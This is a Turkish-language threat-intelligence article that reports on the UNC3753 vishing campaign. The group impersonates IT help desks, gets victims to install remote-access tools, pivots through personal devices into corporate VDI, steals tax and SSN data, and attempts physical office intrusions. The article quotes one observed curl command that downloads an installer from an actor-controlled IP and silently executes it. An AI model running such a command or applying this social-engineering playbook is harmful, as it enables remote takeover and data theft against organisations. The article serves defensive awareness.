UNC3753 Vishing: ABD Finans & Hukuk Firmalarına 1 Saatte Sızdı, Fiziksel Ofis Baskını da Var

Mandiant Google Threat Intelligence Group (GTIG), Ocak–Mayıs 2026 dönemini kapsayan kapsamlı bir analizinde, finansal motivasyonlu tehdit kümesi UNC3753'ün (Luna Moth, Chatty Spider veya Silent Ransom Group olarak da takip edilen) ABD'deki düzinelerce profesyonel hizmet, hukuk ve finans kurumunu hedef aldığını belgeledi. Kampanya, tespit edilen her incident response vakasında saldırı döngüsünün tamamının —ilk temastan veri hırsızlığına ve gasp talebine kadar— tek bir iş günü içinde tamamlandığını ortaya koydu. Son vakalarda ise veri arama, hazırlık (staging) ve sızdırma aşamalarının bir saatten kısa sürede gerçekleştiği gözlemlendi. Bu hız, geleneksel SIEM korelasyon ve alerting mekanizmalarının devreye girmesinden önce operasyonun tamamlandığı anlamına geliyor.

UNC3753'ün saldırı zinciri, insan mühendisliğini (social engineering) teknik araçlarla harmanlayan çok aşamalı bir yapıya sahip. Önce aktör kontrolündeki tüketici e-posta hesaplarından, içinde aktif bağlantı veya zararlı ek bulunmayan 'fatura' temalı tuzak e-postalar gönderiliyor. Bu mesajların amacı hedefin zihninde bir güvenlik kaygısı oluşturarak saldırganın sonraki telefon aramasına zemin hazırlamak. Vishing aşamasında saldırganlar, hedef kurumun BT yardım masası veya güvenlik ekibi mensubu gibi davranarak direkt çağrı yapıyor ve kurbanları Zoom, Microsoft Teams veya Quick Assist üzerinden ekran paylaşımı oturumu başlatmaya ikna ediyor. Kalıcı erişim için ise AnyDesk, Bomgar, Zoho Assist veya SuperOps RMM gibi araçların kurulumu sosyal mühendislikle sağlanıyor. Kurulum komutları, uç nokta tarayıcı veya sohbet geçmişlerinde iz bırakmamak amacıyla Privnote (privnote[.]com) üzerindeki kendiliğinden yok olan mesajlarla iletiliyor. Gözlemlenen örnek cURL komutu: ``` curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet ```

Erişim sağlandıktan sonra tehdit aktörleri, kurumsal sanal masaüstü altyapısına (VDI) sızmak için BYOD (Bring Your Own Device) kişisel uç noktaları bir pivot noktası olarak kullanıyor. Zoom oturumu kurbanın kişisel laptopunda açılıyor; bu laptop üzerinden Windows 365 (Windows365.exe) veya Citrix istemcisi aracılığıyla kurumsal VDI ortamına geçiş yapılıyor. İçeride yerel dizinler, aktif OneDrive klasörleri ve eşlenmiş ağ sürücüleri taranıyor. Saldırganlar, iManage gibi belge yönetim platformlarında W-2, W-9, 1099 vergi formları, denetim dosyaları, kurumsal sözleşmeler ve Sosyal Güvenlik numaraları (SSN) gibi yüksek değerli verileri bulmak için anahtar kelime araması yapıyor; ardından bu dosyaları kullanıcı erişimine açık alt dizinlerde derleyerek dışarı sızdırıyor.

Kampanyanın dikkat çekici bir boyutu, fiziksel saldırı vektörünün devreye girmesi. UNC3753 ile bağlantılı olduğu değerlendirilen vakalarda, sahte BT teknisyeni kimliğine bürünen bireyler kurumsal ofislere fiziksel olarak giriş yaparak uç noktadan USB depolama aracıyla doğrudan veri çalmayı denedi. Bu hibrit yaklaşım —dijital vishing ile fiziksel içeriden tehdit (insider-threat simulation)— saldırı yüzeyini güvenlik kamerası ve ofis erişim kontrolü boyutuna taşıyor. TTP açısından değerlendirildiğinde UNC3753, saldırı döngüsü boyunca yalnızca meşru, imzalı ticari araçlar ve yerleşik işletim sistemi bileşenlerini kullanarak (living-off-the-land) geleneksel kötü amaçlı yazılım tespitinden kaçınıyor. Aynı hedefle beş ayrı çağrı gerçekleştirilen Teams tabanlı bir vakada, grubun sabırlı, uzun soluklu sosyal mühendislik stratejisini de sürdürebildiği gözlemlendi.

Finans ve hukuk sektörü kuruluşları için bu kampanya, özellikle yüksek öncelikli bir risk oluşturuyor: hedeflerin çoğu kurumsal web sitelerinde kamuya açık biçimde listeleniyor, bu da saldırganlara hedef zenginleştirme aşamasında kolaylık sağlıyor. Orta Doğu'daki finansal kuruluşlar ve Kuveyt Türk gibi bölgesel bankalar için doğrudan bir coğrafi atfetme mevcut olmasa da UNC3753'ün yalnızca teknik zafiyetleri değil, insan faktörünü ve fiziksel güvenlik açıklarını istismar etmesi; BT yardım masası prosedürleri, uzaktan erişim politikaları ve personel farkındalık eğitimleri açısından tüm finansal hizmetler sektörü için evrensel bir uyarı niteliği taşıyor.